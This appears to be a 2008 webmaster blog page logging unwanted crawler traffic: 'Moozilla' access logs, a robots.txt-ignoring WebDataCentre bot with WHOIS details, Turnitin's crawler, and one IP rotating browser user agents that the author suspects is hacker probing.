7/2/2008 5:14:44 PM 207.200.116.195 Moozilla
7/2/2008 5:14:44 PM 207.200.116.7 Moozilla
7/2/2008 5:14:44 PM 207.200.116.204 Moozilla
7/2/2008 5:14:44 PM 207.200.116.69 Moozilla
7/2/2008 5:14:44 PM 207.200.116.13 Moozilla
7/2/2008 5:14:44 PM 207.200.116.69 Moozilla
7/2/2008 5:14:44 PM 207.200.116.199 Moozilla
7/2/2008 5:14:44 PM 207.200.116.136 Moozilla
7/2/2008 5:14:44 PM 207.200.116.13 Moozilla
7/2/2008 5:14:43 PM 207.200.116.136 Moozilla
7/2/2008 5:14:43 PM 207.200.116.199 Moozilla
7/2/2008 5:14:43 PM 207.200.116.69 Moozilla
7/2/2008 4:49:03 PM 172.192.160.147 Moozilla
7/2/2008 4:49:03 PM 172.192.160.147 Moozilla
7/2/2008 4:49:03 PM 172.192.160.147 Moozilla
7/2/2008 4:23:56 PM 207.200.116.195 Moozilla
7/2/2008 4:23:50 PM 207.200.116.202 Moozilla
7/2/2008 4:23:50 PM 207.200.116.202 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.197 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.65 Moozilla
7/2/2008 4:23:49 PM 207.200.116.197 Moozilla
7/2/2008 4:23:49 PM 207.200.116.65 Moozilla
7/2/2008 4:23:49 PM 207.200.116.66 Moozilla
7/2/2008 4:23:49 PM 207.200.116.131 Moozilla
7/2/2008 4:23:48 PM 207.200.116.66 Moozilla
7/2/2008 4:23:48 PM 207.200.116.131 Moozilla
7/2/2008 4:23:48 PM 207.200.116.12 Moozilla
7/2/2008 4:23:48 PM 207.200.116.132 Moozilla
7/2/2008 4:23:48 PM 207.200.116.138 Moozilla
7/2/2008 4:23:48 PM 207.200.116.132 Moozilla
7/2/2008 4:23:48 PM 207.200.116.138 Moozilla
7/2/2008 4:23:48 PM 207.200.116.6 Moozilla
7/2/2008 4:23:48 PM 207.200.116.137 Moozilla
7/2/2008 4:23:48 PM 207.200.116.74 Moozilla
7/2/2008 4:23:48 PM 207.200.116.6 Moozilla
7/2/2008 4:23:47 PM 207.200.116.137 Moozilla
7/2/2008 4:23:47 PM 207.200.116.74 Moozilla
7/2/2008 4:23:47 PM 207.200.116.202 Moozilla
7/2/2008 4:23:47 PM 207.200.116.11 Moozilla
7/2/2008 4:23:47 PM 207.200.116.202 Moozilla
7/2/2008 4:23:47 PM 207.200.116.65 Moozilla
7/2/2008 4:23:47 PM 207.200.116.11 Moozilla
7/2/2008 4:23:47 PM 207.200.116.65 Moozilla
7/2/2008 4:23:47 PM 207.200.116.7 Moozilla
7/2/2008 4:23:47 PM 207.200.116.204 Moozilla
7/2/2008 4:23:47 PM 207.200.116.69 Moozilla
7/2/2008 4:23:46 PM 207.200.116.7 Moozilla
7/2/2008 4:23:46 PM 207.200.116.69 Moozilla
7/2/2008 4:23:46 PM 207.200.116.204 Moozilla
7/2/2008 4:23:46 PM 207.200.116.136 Moozilla
7/2/2008 4:23:46 PM 207.200.116.13 Moozilla
7/2/2008 4:23:46 PM 207.200.116.199 Moozilla
7/2/2008 4:23:46 PM 207.200.116.69 Moozilla
7/2/2008 4:23:46 PM 207.200.116.136 Moozilla
7/2/2008 4:23:46 PM 207.200.116.13 Moozilla
7/2/2008 4:23:46 PM 207.200.116.199 Moozilla
7/2/2008 4:23:46 PM 207.200.116.69 Moozilla
7/3/2008 11:02:49 AM 207.200.116.202 Moozilla
7/3/2008 11:02:49 AM 207.200.116.138 Moozilla
7/3/2008 11:02:49 AM 207.200.116.202 Moozilla
7/3/2008 11:02:49 AM 207.200.116.138 Moozilla
7/3/2008 11:02:48 AM 207.200.116.197 Moozilla
7/3/2008 11:02:48 AM 207.200.116.66 Moozilla
7/3/2008 11:02:48 AM 207.200.116.65 Moozilla
7/3/2008 11:02:48 AM 207.200.116.131 Moozilla
7/3/2008 11:02:48 AM 207.200.116.197 Moozilla
7/3/2008 11:02:48 AM 207.200.116.66 Moozilla
7/3/2008 11:02:47 AM 207.200.116.131 Moozilla
7/3/2008 11:02:47 AM 207.200.116.65 Moozilla
7/3/2008 11:02:47 AM 207.200.116.132 Moozilla
7/3/2008 11:02:47 AM 207.200.116.138 Moozilla
7/3/2008 11:02:47 AM 207.200.116.12 Moozilla
7/3/2008 11:02:47 AM 207.200.116.137 Moozilla
7/3/2008 11:02:47 AM 207.200.116.132 Moozilla
7/3/2008 11:02:47 AM 207.200.116.138 Moozilla
7/3/2008 11:02:47 AM 207.200.116.12 Moozilla
7/3/2008 11:02:47 AM 207.200.116.137 Moozilla
7/3/2008 11:02:46 AM 207.200.116.74 Moozilla
7/3/2008 11:02:46 AM 207.200.116.6 Moozilla
7/3/2008 11:02:46 AM 207.200.116.65 Moozilla
7/3/2008 11:02:46 AM 207.200.116.74 Moozilla
7/3/2008 11:02:46 AM 207.200.116.11 Moozilla
7/3/2008 11:02:46 AM 207.200.116.6 Moozilla
7/3/2008 11:02:46 AM 207.200.116.11 Moozilla
7/3/2008 11:02:46 AM 207.200.116.65 Moozilla
7/3/2008 11:02:45 AM 207.200.116.7 Moozilla
7/3/2008 11:02:45 AM 207.200.116.202 Moozilla
7/3/2008 11:02:45 AM 207.200.116.195 Moozilla
7/3/2008 11:02:45 AM 207.200.116.7 Moozilla
7/3/2008 11:02:45 AM 207.200.116.69 Moozilla
7/3/2008 11:02:45 AM 207.200.116.202 Moozilla
7/3/2008 11:02:45 AM 207.200.116.195 Moozilla
7/3/2008 11:02:45 AM 207.200.116.69 Moozilla
7/3/2008 11:02:43 AM 207.200.116.204 Moozilla
7/3/2008 11:02:43 AM 207.200.116.13 Moozilla
7/3/2008 11:02:42 AM 207.200.116.69 Moozilla
7/3/2008 11:02:41 AM 207.200.116.199 Moozilla
7/3/2008 11:02:41 AM 207.200.116.136 Moozilla
7/3/2008 7:44:34 AM 207.200.116.202 Moozilla
7/3/2008 7:44:34 AM 207.200.116.138 Moozilla
7/3/2008 7:44:34 AM 207.200.116.202 Moozilla
7/3/2008 7:44:34 AM 207.200.116.197 Moozilla
7/3/2008 7:44:34 AM 207.200.116.138 Moozilla
7/3/2008 7:44:34 AM 207.200.116.197 Moozilla
7/3/2008 7:44:34 AM 207.200.116.65 Moozilla
7/3/2008 7:44:34 AM 207.200.116.131 Moozilla
7/3/2008 7:44:34 AM 207.200.116.66 Moozilla
7/3/2008 7:44:34 AM 207.200.116.131 Moozilla
7/3/2008 7:44:34 AM 207.200.116.12 Moozilla
7/3/2008 7:44:34 AM 207.200.116.65 Moozilla
7/3/2008 7:44:33 AM 207.200.116.66 Moozilla
7/3/2008 7:44:33 AM 207.200.116.12 Moozilla
7/3/2008 7:44:33 AM 207.200.116.138 Moozilla
7/3/2008 7:44:33 AM 207.200.116.132 Moozilla
7/3/2008 7:44:33 AM 207.200.116.137 Moozilla
7/3/2008 7:44:33 AM 207.200.116.138 Moozilla
7/3/2008 7:44:33 AM 207.200.116.132 Moozilla
7/3/2008 7:44:33 AM 207.200.116.137 Moozilla
7/3/2008 7:44:32 AM 207.200.116.6 Moozilla
7/3/2008 7:44:32 AM 207.200.116.74 Moozilla
7/3/2008 7:44:32 AM 207.200.116.11 Moozilla
7/3/2008 7:44:32 AM 207.200.116.65 Moozilla
7/3/2008 7:44:32 AM 207.200.116.74 Moozilla
7/3/2008 7:44:32 AM 207.200.116.202 Moozilla
7/3/2008 7:44:32 AM 207.200.116.11 Moozilla
7/3/2008 7:44:32 AM 207.200.116.65 Moozilla
7/3/2008 7:44:32 AM 207.200.116.202 Moozilla
7/3/2008 7:44:32 AM 207.200.116.7 Moozilla
7/3/2008 7:44:32 AM 207.200.116.195 Moozilla
7/3/2008 7:44:32 AM 207.200.116.69 Moozilla
7/3/2008 7:44:32 AM 207.200.116.204 Moozilla
7/3/2008 7:44:32 AM 207.200.116.7 Moozilla
7/3/2008 7:44:32 AM 207.200.116.195 Moozilla
7/3/2008 7:44:32 AM 207.200.116.69 Moozilla
7/3/2008 7:44:31 AM 207.200.116.204 Moozilla
7/3/2008 7:44:31 AM 207.200.116.13 Moozilla
7/3/2008 7:44:31 AM 207.200.116.136 Moozilla
7/3/2008 7:44:31 AM 207.200.116.199 Moozilla
7/3/2008 7:44:31 AM 207.200.116.69 Moozilla
7/3/2008 7:44:31 AM 207.200.116.13 Moozilla
7/3/2008 7:44:31 AM 207.200.116.136 Moozilla
7/3/2008 7:44:31 AM 207.200.116.199 Moozilla
7/3/2008 7:44:31 AM 207.200.116.69 Moozilla
7/2/2008 11:53:13 PM 66.114.145.245 Moozilla
7/2/2008 11:53:13 PM 66.114.145.245 Moozilla
7/2/2008 7:46:34 PM 207.200.116.202 Moozilla
7/2/2008 7:46:34 PM 207.200.116.138 Moozilla
7/2/2008 7:46:34 PM 207.200.116.202 Moozilla
7/2/2008 7:46:34 PM 207.200.116.138 Moozilla
7/2/2008 7:46:33 PM 207.200.116.197 Moozilla
7/2/2008 7:46:33 PM 207.200.116.65 Moozilla
7/2/2008 7:46:33 PM 207.200.116.138 Moozilla
7/2/2008 7:46:33 PM 207.200.116.197 Moozilla
7/2/2008 7:46:33 PM 207.200.116.65 Moozilla
7/2/2008 7:46:33 PM 207.200.116.66 Moozilla
7/2/2008 7:46:33 PM 207.200.116.131 Moozilla
7/2/2008 7:46:33 PM 207.200.116.66 Moozilla
7/2/2008 7:46:33 PM 207.200.116.12 Moozilla
7/2/2008 7:46:33 PM 207.200.116.131 Moozilla
7/2/2008 7:46:33 PM 207.200.116.12 Moozilla
7/2/2008 7:46:32 PM 207.200.116.138 Moozilla
7/2/2008 7:46:32 PM 207.200.116.132 Moozilla
7/2/2008 7:46:32 PM 207.200.116.137 Moozilla
7/2/2008 7:46:32 PM 207.200.116.138 Moozilla
7/2/2008 7:46:32 PM 207.200.116.132 Moozilla
7/2/2008 7:46:32 PM 207.200.116.137 Moozilla
7/2/2008 7:46:32 PM 207.200.116.6 Moozilla
7/2/2008 7:46:32 PM 207.200.116.74 Moozilla
7/2/2008 7:46:32 PM 207.200.116.6 Moozilla
7/2/2008 7:46:32 PM 207.200.116.74 Moozilla
7/2/2008 7:46:31 PM 207.200.116.11 Moozilla
7/2/2008 7:46:31 PM 207.200.116.65 Moozilla
7/2/2008 7:46:31 PM 207.200.116.195 Moozilla
7/2/2008 7:46:31 PM 207.200.116.65 Moozilla
7/2/2008 7:46:31 PM 207.200.116.202 Moozilla
7/2/2008 7:46:31 PM 207.200.116.195 Moozilla
7/2/2008 7:46:31 PM 207.200.116.7 Moozilla
7/2/2008 7:46:31 PM 24.18.131.178 Moozilla
7/2/2008 7:46:31 PM 207.200.116.7 Moozilla
7/2/2008 7:46:31 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.204 Moozilla
7/2/2008 7:46:30 PM 207.200.116.13 Moozilla
7/2/2008 7:46:30 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.204 Moozilla
7/2/2008 7:46:30 PM 207.200.116.13 Moozilla
7/2/2008 7:46:30 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.136 Moozilla
7/2/2008 7:46:30 PM 207.200.116.199 Moozilla
7/2/2008 7:46:30 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.136 Moozilla
7/2/2008 7:46:30 PM 207.200.116.199 Moozilla
7/2/2008 7:09:08 PM 71.35.127.98 Moozilla
7/2/2008 7:09:08 PM 71.35.127.98 Moozilla
7/2/2008 5:57:43 PM 207.200.116.195 Moozilla
7/2/2008 5:57:43 PM 207.200.116.202 Moozilla
7/2/2008 5:57:42 PM 207.200.116.138 Moozilla
7/2/2008 5:57:42 PM 207.200.116.195 Moozilla
7/2/2008 5:57:42 PM 207.200.116.138 Moozilla
7/2/2008 5:57:42 PM 207.200.116.197 Moozilla
7/2/2008 5:57:42 PM 207.200.116.138 Moozilla
7/2/2008 5:57:42 PM 207.200.116.197 Moozilla
7/2/2008 5:57:42 PM 207.200.116.65 Moozilla
7/2/2008 5:57:42 PM 207.200.116.66 Moozilla
7/2/2008 5:57:42 PM 207.200.116.65 Moozilla
7/2/2008 5:57:42 PM 207.200.116.131 Moozilla
7/2/2008 5:57:42 PM 207.200.116.66 Moozilla
7/2/2008 5:57:41 PM 207.200.116.131 Moozilla
7/2/2008 5:57:41 PM 207.200.116.12 Moozilla
7/2/2008 5:57:41 PM 207.200.116.132 Moozilla
7/2/2008 5:57:41 PM 207.200.116.12 Moozilla
7/2/2008 5:57:41 PM 207.200.116.138 Moozilla
7/2/2008 5:57:41 PM 207.200.116.6 Moozilla
7/2/2008 5:57:41 PM 207.200.116.137 Moozilla
7/2/2008 5:57:41 PM 207.200.116.74 Moozilla
7/2/2008 5:57:41 PM 207.200.116.6 Moozilla
7/2/2008 5:57:41 PM 207.200.116.137 Moozilla
7/2/2008 5:57:40 PM 207.200.116.74 Moozilla
7/2/2008 5:57:40 PM 207.200.116.65 Moozilla
7/2/2008 5:57:40 PM 207.200.116.11 Moozilla
7/2/2008 5:57:40 PM 207.200.116.202 Moozilla
7/2/2008 5:57:40 PM 207.200.116.11 Moozilla
7/2/2008 5:57:40 PM 207.200.116.65 Moozilla
7/2/2008 5:57:40 PM 207.200.116.202 Moozilla
7/2/2008 5:57:40 PM 207.200.116.204 Moozilla
7/2/2008 5:57:40 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.7 Moozilla
7/2/2008 5:57:39 PM 207.200.116.204 Moozilla
7/2/2008 5:57:39 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.7 Moozilla
7/2/2008 5:57:39 PM 207.200.116.13 Moozilla
7/2/2008 5:57:39 PM 207.200.116.199 Moozilla
7/2/2008 5:57:39 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.136 Moozilla
7/2/2008 5:57:39 PM 207.200.116.13 Moozilla
7/2/2008 5:57:39 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.136 Moozilla
7/2/2008 5:57:39 PM 207.200.116.199 Moozilla
7/2/2008 5:14:49 PM 207.200.116.199 Moozilla
7/2/2008 5:14:49 PM 207.200.116.69 Moozilla
7/2/2008 5:14:49 PM 207.200.116.138 Moozilla
7/2/2008 5:14:49 PM 207.200.116.69 Moozilla
7/2/2008 5:14:49 PM 207.200.116.199 Moozilla
7/2/2008 5:14:49 PM 207.200.116.138 Moozilla
7/2/2008 5:14:48 PM 207.200.116.138 Moozilla
7/2/2008 5:14:48 PM 207.200.116.69 Moozilla
7/2/2008 5:14:48 PM 207.200.116.199 Moozilla
7/2/2008 5:14:48 PM 207.200.116.69 Moozilla
7/2/2008 5:14:48 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.202 Moozilla
7/2/2008 5:14:47 PM 207.200.116.197 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.197 Moozilla
7/2/2008 5:14:46 PM 207.200.116.65 Moozilla
7/2/2008 5:14:46 PM 207.200.116.66 Moozilla
7/2/2008 5:14:46 PM 207.200.116.131 Moozilla
7/2/2008 5:14:46 PM 207.200.116.65 Moozilla
7/2/2008 5:14:46 PM 207.200.116.66 Moozilla
7/2/2008 5:14:46 PM 207.200.116.131 Moozilla
7/2/2008 5:14:46 PM 207.200.116.12 Moozilla
7/2/2008 5:14:46 PM 207.200.116.132 Moozilla
7/2/2008 5:14:46 PM 207.200.116.138 Moozilla
7/2/2008 5:14:46 PM 207.200.116.132 Moozilla
7/2/2008 5:14:46 PM 207.200.116.138 Moozilla
7/2/2008 5:14:46 PM 207.200.116.6 Moozilla
7/2/2008 5:14:45 PM 207.200.116.137 Moozilla
7/2/2008 5:14:45 PM 207.200.116.6 Moozilla
7/2/2008 5:14:45 PM 207.200.116.11 Moozilla
7/2/2008 5:14:45 PM 207.200.116.74 Moozilla
7/2/2008 5:14:45 PM 207.200.116.65 Moozilla
7/2/2008 5:14:45 PM 207.200.116.74 Moozilla
7/2/2008 5:14:45 PM 207.200.116.11 Moozilla
7/2/2008 5:14:45 PM 207.200.116.202 Moozilla
7/2/2008 5:14:45 PM 207.200.116.65 Moozilla
7/2/2008 5:14:45 PM 207.200.116.202 Moozilla
7/2/2008 5:14:45 PM 207.200.116.195 Moozilla
7/2/2008 5:14:44 PM 207.200.116.7 Moozilla
7/2/2008 5:14:44 PM 207.200.116.204 Moozilla
7/2/2008 5:14:44 PM 207.200.116.69 Moozilla
7/2/2008 5:14:44 PM 207.200.116.195 Moozilla
7/2/2008 5:14:44 PM 207.200.116.7 Moozilla
7/2/2008 5:14:44 PM 207.200.116.204 Moozilla
7/2/2008 5:14:44 PM 207.200.116.69 Moozilla
7/2/2008 5:14:44 PM 207.200.116.13 Moozilla
7/2/2008 5:14:44 PM 207.200.116.69 Moozilla
7/2/2008 5:14:44 PM 207.200.116.199 Moozilla
7/2/2008 5:14:44 PM 207.200.116.136 Moozilla
7/2/2008 5:14:44 PM 207.200.116.13 Moozilla
7/2/2008 5:14:43 PM 207.200.116.136 Moozilla
7/2/2008 5:14:43 PM 207.200.116.199 Moozilla
7/2/2008 5:14:43 PM 207.200.116.69 Moozilla
7/2/2008 4:49:03 PM 172.192.160.147 Moozilla
7/2/2008 4:49:03 PM 172.192.160.147 Moozilla
7/2/2008 4:49:03 PM 172.192.160.147 Moozilla
7/2/2008 4:23:56 PM 207.200.116.195 Moozilla
7/2/2008 4:23:50 PM 207.200.116.202 Moozilla
7/2/2008 4:23:50 PM 207.200.116.202 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.197 Moozilla
7/2/2008 4:23:49 PM 207.200.116.138 Moozilla
7/2/2008 4:23:49 PM 207.200.116.65 Moozilla
7/2/2008 4:23:49 PM 207.200.116.197 Moozilla
7/2/2008 4:23:49 PM 207.200.116.65 Moozilla
7/2/2008 4:23:49 PM 207.200.116.66 Moozilla
7/2/2008 4:23:49 PM 207.200.116.131 Moozilla
7/2/2008 4:23:48 PM 207.200.116.66 Moozilla
7/2/2008 4:23:48 PM 207.200.116.131 Moozilla
7/2/2008 4:23:48 PM 207.200.116.12 Moozilla
7/2/2008 4:23:48 PM 207.200.116.132 Moozilla
7/2/2008 4:23:48 PM 207.200.116.138 Moozilla
7/2/2008 4:23:48 PM 207.200.116.132 Moozilla
7/2/2008 4:23:48 PM 207.200.116.138 Moozilla
7/2/2008 4:23:48 PM 207.200.116.6 Moozilla
7/2/2008 4:23:48 PM 207.200.116.137 Moozilla
7/2/2008 4:23:48 PM 207.200.116.74 Moozilla
7/2/2008 4:23:48 PM 207.200.116.6 Moozilla
7/2/2008 4:23:47 PM 207.200.116.137 Moozilla
7/2/2008 4:23:47 PM 207.200.116.74 Moozilla
7/2/2008 4:23:47 PM 207.200.116.202 Moozilla
7/2/2008 4:23:47 PM 207.200.116.11 Moozilla
7/2/2008 4:23:47 PM 207.200.116.202 Moozilla
7/2/2008 4:23:47 PM 207.200.116.65 Moozilla
7/2/2008 4:23:47 PM 207.200.116.11 Moozilla
7/2/2008 4:23:47 PM 207.200.116.65 Moozilla
7/2/2008 4:23:47 PM 207.200.116.7 Moozilla
7/2/2008 4:23:47 PM 207.200.116.204 Moozilla
7/2/2008 4:23:47 PM 207.200.116.69 Moozilla
7/2/2008 4:23:46 PM 207.200.116.7 Moozilla
7/2/2008 4:23:46 PM 207.200.116.69 Moozilla
7/2/2008 4:23:46 PM 207.200.116.204 Moozilla
7/2/2008 4:23:46 PM 207.200.116.136 Moozilla
7/2/2008 4:23:46 PM 207.200.116.13 Moozilla
7/2/2008 4:23:46 PM 207.200.116.199 Moozilla
7/2/2008 4:23:46 PM 207.200.116.69 Moozilla
7/2/2008 4:23:46 PM 207.200.116.136 Moozilla
7/2/2008 4:23:46 PM 207.200.116.13 Moozilla
7/2/2008 4:23:46 PM 207.200.116.199 Moozilla
7/2/2008 4:23:46 PM 207.200.116.69 Moozilla
WebDataCentre.com: Bad Bot
WebDataCentre.com has a bad bot which does not obey robots.txt file telling them to stay off our web sites. The user agent looks like this:
Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)
The network is an old favorite which seems to be full of suspiciousness:
OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US
ReferralServer: rwhois://rwhois.softlayer.com:4321
NetRange: 67.228.0.0 - 67.228.255.255
Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)
The network is an old favorite which seems to be full of suspiciousness:
OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US
ReferralServer: rwhois://rwhois.softlayer.com:4321
NetRange: 67.228.0.0 - 67.228.255.255
Wednesday, June 18, 2008
Turnitin Bot Not Behaving
Turnitinbot is still not behaving. We have blocked it with our robots.txt file and it is still bombing our sites - using bandwidth and resources unneccessarily.
Wednesday, June 11, 2008
Hackers trying different user agents to bypass bot filters perhaps?
This is pretty clearly hacker traffic as the same IP is basically trying out different user agents one after another...the same thing is coming in from different networks:
1 74.86.171.82 5/2/2008 11:54:44 AM Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2 74.86.171.82 5/2/2008 11:54:44 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
1 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.4 (build 01348))
2 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/5.0 (Windows NT 5.1; U) Opera 7.54 [ru]
3 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/5.0 (compatible; Googlebot/2.1;+http://www.google.com/bot.html)
4 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
2 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://www.tropicdesigns.net)
1 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; MRA 4.0 (build 00768))
3 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
1 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
4 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
6 77.188.143.240 3/21/2008 12:02:48 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
5 77.188.143.240 3/21/2008 12:02:47 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
6 77.188.143.240 3/21/2008 12:02:47 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
6 77.188.143.240 3/21/2008 12:02:45 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)
12 77.188.143.240 3/21/2008 12:02:45 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
8 77.188.143.240 3/21/2008 12:02:44 AM Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
3 68.178.99.210 3/20/2008 5:46:16 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
1 84.121.217.19 3/20/2008 3:13:25 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)
2 84.121.217.19 3/20/2008 3:13:24 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
2 84.121.217.19 3/20/2008 3:13:23 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2 84.121.217.19 3/20/2008 3:13:23 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
1 84.121.217.19 3/20/2008 3:13:22 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 84.121.217.19 3/20/2008 3:13:21 PM Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
1 74.86.171.82 5/2/2008 11:54:44 AM Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2 74.86.171.82 5/2/2008 11:54:44 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
1 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.4 (build 01348))
2 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/5.0 (Windows NT 5.1; U) Opera 7.54 [ru]
3 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/5.0 (compatible; Googlebot/2.1;+http://www.google.com/bot.html)
4 74.86.171.82 5/2/2008 11:54:43 AM Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
2 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://www.tropicdesigns.net)
1 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; MRA 4.0 (build 00768))
3 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
1 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
4 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2 74.86.171.82 5/2/2008 11:54:42 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
6 77.188.143.240 3/21/2008 12:02:48 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
5 77.188.143.240 3/21/2008 12:02:47 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
6 77.188.143.240 3/21/2008 12:02:47 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
6 77.188.143.240 3/21/2008 12:02:45 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)
12 77.188.143.240 3/21/2008 12:02:45 AM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
8 77.188.143.240 3/21/2008 12:02:44 AM Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
3 68.178.99.210 3/20/2008 5:46:16 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
1 84.121.217.19 3/20/2008 3:13:25 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)
2 84.121.217.19 3/20/2008 3:13:24 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
2 84.121.217.19 3/20/2008 3:13:23 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2 84.121.217.19 3/20/2008 3:13:23 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
1 84.121.217.19 3/20/2008 3:13:22 PM Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 84.121.217.19 3/20/2008 3:13:21 PM Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Tuesday, June 10, 2008
Fraudulent Google Ad Clicks
